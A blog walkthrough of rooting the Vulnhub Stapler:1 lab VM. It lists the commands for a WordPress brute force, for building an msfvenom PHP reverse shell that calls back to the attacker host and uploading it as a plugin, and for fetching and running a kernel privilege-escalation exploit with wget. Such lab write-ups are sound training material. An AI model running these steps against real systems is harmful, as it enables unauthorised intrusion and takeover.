Stapler:1 – CTF

This is a walkthrough of how I gained root access to the Stapler:1 image from Vulnhub.com.  This walkthrough is being provided for educational purposes only.  All testing on this image was done in an isolated lab environment.  Understand that using the tools in this walkthrough against a host without permission is against the law.  Be smart folks, and enjoy the walkthrough.

Full NMAP Scan of host:

root@kali:~# nmap -p- -A 192.168.1.235

stapler1

There are a lot of ports/services to enumerate here.  After some time, my enumeration of port 12380 uncovered some interesting things.

Enumerating port 12380 using Nikto:

root@kali:~# nikto -h https://192.168.1.235:12380

stapler2

Nikto scan found the robots.txt file and 2 entries within.  Investigating these brings me to a WordPress page.

stapler3

Using WPScan to to get version and plugin info:

root@kali:~# wpscan –url https://192.168.1.235:12380/blogblog/

stapler4

WordPress version is 4.2.1.  I didn’t find anything useful in regards to plugins or versions.

Using WPScan to enumerate users:

root@kali:~# wpscan -u https://192.168.1.235:12380/blogblog/ –enumerate u

stapler5

Using WPScan to brute force login (starting with john):

root@kali:~# wpscan -u https://192.168.1.235:12380/blogblog/ –wordlist /usr/share/wordlists/rockyou.txt –username john

wpscan6

I am able to login to WordPress using the credentials john/incorrect. Now to create a reverse shell payload.

Creating reverse shell payload using Msfvenom:

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.234 LPORT=4444 -f raw > shell235.php

stapler7

Uploading my .php reverse shell to the plugins page:

Browse to plugins –> add new –> upload plugins.  Find the php shellcode and upload.  In my case, the file is shell235.php.

stapler9

After clicking install now the next page will ask for an FTP path and FTP credentials. You don’t have to do anything here, the file has been uploaded.

Verifying the .php file has been uploaded:

stapler10

As you can see, my shell235.php is here.  Now lets get our Metasploit handler ready to catch this shell.

Metasploit handler options:

stapler8

Execute the reverse shell by clicking on shell235.php:

stapler10

Catching low privilege shell:

stapler11

As you can see from the screenshot, we are connected via the low privilege user www-data.

OS Enumeration provides the kernel and Linux flavor/version:

stapler12

Searching the local Exploit DB for privilege escalation vulnerabilities:

root@kali:~# searchsploit linux kernel 4.4 Ubuntu 16

stapler13

Identified a local privilege escalation exploit.  EDB-ID 39772/CVE-2016-4557.  POC code can be found/downloaded here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

Transferred exploit code using WGET:

wget http://192.168.1.234/exploit.tar

stapler14

Compiled Exploit:

./compile.sh

stapler15

Running exploit code:

www-data@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput

stapler16

Exploit code worked!

Flag.txt file:

cat /root/flag.txt

stapler17

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s